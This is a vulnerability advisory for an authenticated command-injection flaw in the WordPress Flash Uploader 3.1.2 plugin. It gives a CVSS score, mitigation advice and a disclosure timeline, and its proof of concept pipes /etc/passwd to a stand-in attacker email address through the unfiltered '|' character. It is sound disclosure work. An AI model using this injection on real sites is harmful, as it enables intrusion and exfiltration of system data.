Wordpress Flash Uploader 3.1.2, Arbitrary Command Execution
Arbitary command execution. Requires authentication. A user with access to the settings panel to the WordPress Flash Uploader has the ability to execute arbitary shell commands via specially crafted form input. While it is true, that if an attacker has gained administrative privileges to a WordPress blog, they could just install their own plugin, this is only the case if plugins can be installed without FTP details. This could lead to disclosure of sensitive information under the context of the web server, or deployment of arbitary code (i.e. a web shell).
Homepage
https://wordpress.org/plugins/wordpress-flash-uploader/
CVSS Score
4.9
CSSS Vector
(AV:N/AC:M/Au:S/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
Administrative
Mitigation
Filter user input so as to only allow alpha-numeric characters. Ensure the path actually exists before executing the ‘check_image_magic’ method (and subsequently testing the provided path using shell_exec / exec).
Proof of Concept
Install the WordPress Flash Uploader plugin Browse to http://localhost/wp-admin/options-general.php?page=wordpress-flash-uploader.php Input your command into the ‘Image magick command’ field. Note: the ‘>’ symbol is filtered, but the ‘|’ symbol is not. i.e. cat /etc/passwd | mail naughty.person@attacker.org
Timeline
- 2014-07-18: Discovered
- 2014-07-18: Reported to vendor
- 2014-07-21: Reported to alternative vendor address
- 2014-07-21: Received response – vendor believes not an issue, due to authentication requirement
- 2014-07-21: Re-iterated concern regarding arbitrary command execution
- 2014-07-21: Fix published by vendor
- 2014-08-05: Advisory released